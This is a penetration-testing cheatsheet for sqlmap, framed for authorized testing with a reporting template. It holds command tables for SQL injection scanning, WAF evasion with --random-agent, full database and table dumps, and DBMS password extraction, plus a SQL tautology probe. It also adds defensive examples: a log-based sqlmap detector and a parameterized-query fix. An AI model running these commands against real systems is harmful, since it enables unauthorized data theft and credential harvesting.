Methodology Checklist
- Test GET param: `sqlmap -u "http://[TARGET]/page?id=1"`
- Test POST param: `sqlmap -u [URL] --data "user=admin&pass=test"`
- Specify param: `sqlmap -u [URL] -p id`
- Use Burp request file: `sqlmap -r request.txt`
- Enumerate databases: `sqlmap -u [URL] --dbs`
- Enumerate tables: `sqlmap -u [URL] -D [DB] --tables`
- Dump table: `sqlmap -u [URL] -D [DB] -T [TABLE] -C [COLS] --dump`
- Batch mode (no prompts): `--batch`
Operational Context
Use when: SQL injection is confirmed or suspected; SQLMap automates enumeration, extraction, and exploitation of SQL injection vulnerabilities.
Think Dumber First: Save the request in Burp (Right-click → Save item), then run `sqlmap -r request.txt --batch --dbs`. SQLMap reads the full request, including cookies and headers, which is simpler than constructing the URL manually.
Skip when: Manual injection has already achieved full data extraction; SQLMap automation adds noise and detection risk for diminishing returns.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `sqlmap -u 'http://[TARGET_IP]/page.php?id=1'` | Basic GET scan |
| `sqlmap -u 'http://[TARGET_IP]/' --data='uid=1&name=test'` | POST data scan |
| `sqlmap -u 'http://[TARGET_IP]/' --data='uid=1*&name=test'` | Asterisk `*` marks the exact injection point |
| `sqlmap -u 'http://[TARGET_IP]/' --data='uid=1' -p uid` | Restrict testing to a specific parameter |
| `sqlmap -r request.txt` | Feed a raw Burp request file |
| `sqlmap -r request.txt --batch --dump -T users` | Auto-answer prompts and dump a table |
| `sqlmap -u 'http://[TARGET_IP]/' --cookie='id=1*'` | Inject into a cookie |
| `sqlmap -u 'http://[TARGET_IP]/' -H 'Authorization: Bearer [TOKEN]'` | Custom header (`-H` takes the header as a separate argument, not `-H=`) |
| `sqlmap -u 'http://[TARGET_IP]/' --random-agent` | Random User-Agent (bypasses WAF signature check on the default `sqlmap/` agent) |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' --banner --current-user --current-db --is-dba` | Quick environment fingerprint |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] --tables` | List tables in a database |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] -T [TABLE] --dump` | Dump a table |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] -T [TABLE] -C col1,col2 --dump` | Dump specific columns |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] -T [TABLE] --start=1 --stop=10 --dump` | Dump a row range |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' -D [DB] -T [TABLE] --dump --where="name LIKE 'f%'"` | Conditional dump |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' --dump-all --exclude-sysdbs` | Dump all non-system DBs |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' --parse-errors` | Print raw DB errors to the console |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' -v 3` | Show injected payloads only (no HTML flood) |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' -v 6` | Full HTTP traffic verbosity |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' --proxy="http://127.0.0.1:8080"` | Route through Burp |
| `sqlmap -u 'http://[TARGET_IP]/?id=1' --fresh-queries --flush-session` | Clear the session cache |
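The cheatsheet notes that `--random-agent` defeats a WAF signature check on the User-Agent, and that automation "adds noise and detection risk". This added example (not from the cheatsheet) shows what that noise looks like from the defender's side: it parses constructed combined-format access log lines and flags both the default `sqlmap/` User-Agent and the signal `--random-agent` cannot hide, one client probing one parameter with many distinct values. The log lines, IPs and version string are constructed.

```python
"""Flag sqlmap-style activity in web-server access logs (added example, not
from the cheatsheet). Two signals: the tool's default User-Agent, which
--random-agent suppresses, and a burst of distinct values hitting one
parameter from one client, which --random-agent does not hide."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=1%20AND%201%3D2 HTTP/1.1" 200 200 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 90 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?id=1%20ORDER%20BY%205 HTTP/1.1" 500 90 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page.php?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \d+ "[^"]*" "([^"]*)"'
)

def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, target, status, ua = m.groups()
    url = urlsplit(target)
    return {
        "ip": ip, "method": method, "path": url.path, "status": int(status),
        "ua": ua, "params": dict(parse_qsl(url.query, keep_blank_values=True)),
    }

def find_sqlmap_activity(log_text, burst_threshold=4):
    """Return (ips sending a sqlmap User-Agent, sorted (ip, path, param) keys
    that received at least burst_threshold distinct decoded values)."""
    ua_ips = set()
    seen = defaultdict(set)  # (ip, path, param) -> distinct decoded values
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if "sqlmap" in rec["ua"].lower():
            ua_ips.add(rec["ip"])
        for name, value in rec["params"].items():
            seen[(rec["ip"], rec["path"], name)].add(value)
    bursts = sorted(k for k, vals in seen.items() if len(vals) >= burst_threshold)
    return sorted(ua_ips), bursts

if __name__ == "__main__":
    print(find_sqlmap_activity(SAMPLE_LOG))
```

The burst rule is the one worth tuning in production: a real scan sends hundreds of values per parameter in seconds, so a time window plus a threshold well above four keeps false positives low.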
Deep Dive & Workflow
BEUSTQ Technique Reference
| Letter | Technique | Speed | When to use |
|---|---|---|---|
| B | Boolean-blind | Medium | Universal fallback |
| E | Error-based | Fast | DB errors visible in response |
| U | UNION-based | Fastest | Visible output columns |
| S | Stacked queries | Variable | RCE/DDL; needs MSSQL/PostgreSQL |
| T | Time-based blind | Slowest | UPDATE/INSERT (no output) |
| Q | Inline query | Rare | Specific app architecture |
Force specific techniques: --technique=BEU (skip slow time-based).
Request Configuration
```bash
# Copy as cURL from the browser → replace 'curl' with 'sqlmap'
# Burp request file (most reliable for complex POST/JSON)
sqlmap -r request.txt
# JSON POST inline
sqlmap -u 'http://[TARGET_IP]/' --data='{"id":1}' --method PUT
# Cookie injection
sqlmap -u 'http://[TARGET_IP]/' --cookie='id=1*' --random-agent
# Header injection (asterisk marks the injection point; -H takes the header as a separate argument)
sqlmap -u 'http://[TARGET_IP]/' -H 'User-Agent: *'
```
Enumeration Workflow
```bash
# Step 1: Fingerprint environment
sqlmap -u "http://[TARGET_IP]/?id=1" --banner --current-user --current-db --is-dba
# Step 2: List tables
sqlmap -u "http://[TARGET_IP]/?id=1" -D mydb --tables
# Step 3: Dump target table
sqlmap -u "http://[TARGET_IP]/?id=1" -D mydb -T users --dump
# Step 4: Search for sensitive columns/tables (when the DB is huge)
sqlmap -u "http://[TARGET_IP]/?id=1" --search -C pass
sqlmap -u "http://[TARGET_IP]/?id=1" --search -T user
# Step 5: Schema map (structure without data)
sqlmap -u "http://[TARGET_IP]/?id=1" --schema
# Step 6: DBMS service account passwords
sqlmap -u "http://[TARGET_IP]/?id=1" --passwords
```
Always use the -D flag: omitting it defaults to the current DB context and may miss the target data.
Always use --exclude-sysdbs with --dump-all: system DBs waste hours.
Debugging
- `--parse-errors` → reveal raw SQL errors (tells you the query structure)
- `-t /tmp/traffic.txt` → save all HTTP traffic to a file (for long scans)
- `--proxy=http://127.0.0.1:8080` → route to Burp for manual inspection
- `-v 3` → payloads only
- `-v 6` → everything (noisy)
- `--fresh-queries --flush-session` → if the scan behaves strangely (stale cache)
If --parse-errors reveals the exact query structure, manual exploitation via Burp Repeater may be faster.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| SQLMap returns "not injectable" | Wrong parameter targeted | Specify param: -p username; or use --level=5 --risk=3 for aggressive testing |
| SQLMap hangs indefinitely | Target too slow or blocked | Add --timeout=30 --retries=2; use --technique=B (boolean only) to skip time-based |
| Cookies not included | Session required | Add cookie: --cookie='session=...' or save full Burp request with -r request.txt |
| SQLMap detects but can't extract | DB user has no SELECT on target table | Try --privileges to check; extract from accessible tables only |
| sqlmap.py not found | Package issue | Use python3 /usr/share/sqlmap/sqlmap.py or install via pip: pip3 install sqlmap |
Reporting Trigger
Finding Title: SQL Injection Confirmed and Exploited via SQLMap
Impact: Automated SQLMap exploitation confirms SQL injection with complete database enumeration, table extraction, and credential harvesting, demonstrating that the vulnerability is exploitable with publicly available tools requiring no specialized knowledge.
Root Cause: User input passed unsanitized to SQL queries; no input validation or parameterization in the database interaction layer.
Recommendation: Implement prepared statements universally. Conduct code review of all database interaction points. Deploy a WAF as a compensating control. Run automated SQLi testing in the CI/CD pipeline to detect regressions.
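The root cause and recommendation above, side by side as an added example (not from the cheatsheet): a query built by string concatenation next to the same lookup as a prepared statement, run against a constructed in-memory SQLite table. The boolean tautology input is the classic probe that SQLMap's boolean-blind technique automates; the table name, rows and input are all constructed.

```python
"""Root cause vs fix: string-built SQL beside a parameterized query.
Added example, not from the cheatsheet; data and probe are constructed."""
import sqlite3

def make_db():
    """Constructed sample table for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn

def lookup_vulnerable(conn, username):
    # Root cause: user input is spliced into the query text, so a quote in
    # the input ends the string literal and the rest is parsed as SQL.
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             "ORDER BY username")
    return [row[0] for row in conn.execute(query)]

def lookup_parameterized(conn, username):
    # Fix: a placeholder plus a bound value. The driver sends the query
    # structure and the value separately; the value is never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? ORDER BY username"
    return [row[0] for row in conn.execute(query, (username,))]

PROBE = "x' OR '1'='1"  # constructed tautology input

def demo():
    """Run both lookups with the probe and with a normal value."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PROBE),      # every row leaks
        "parameterized": lookup_parameterized(conn, PROBE),  # no match
        "normal": lookup_parameterized(conn, "bob"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The same contrast holds for the "UPDATE/INSERT (no output)" case in the technique table: a parameterized statement closes the hole regardless of whether the application ever echoes query results.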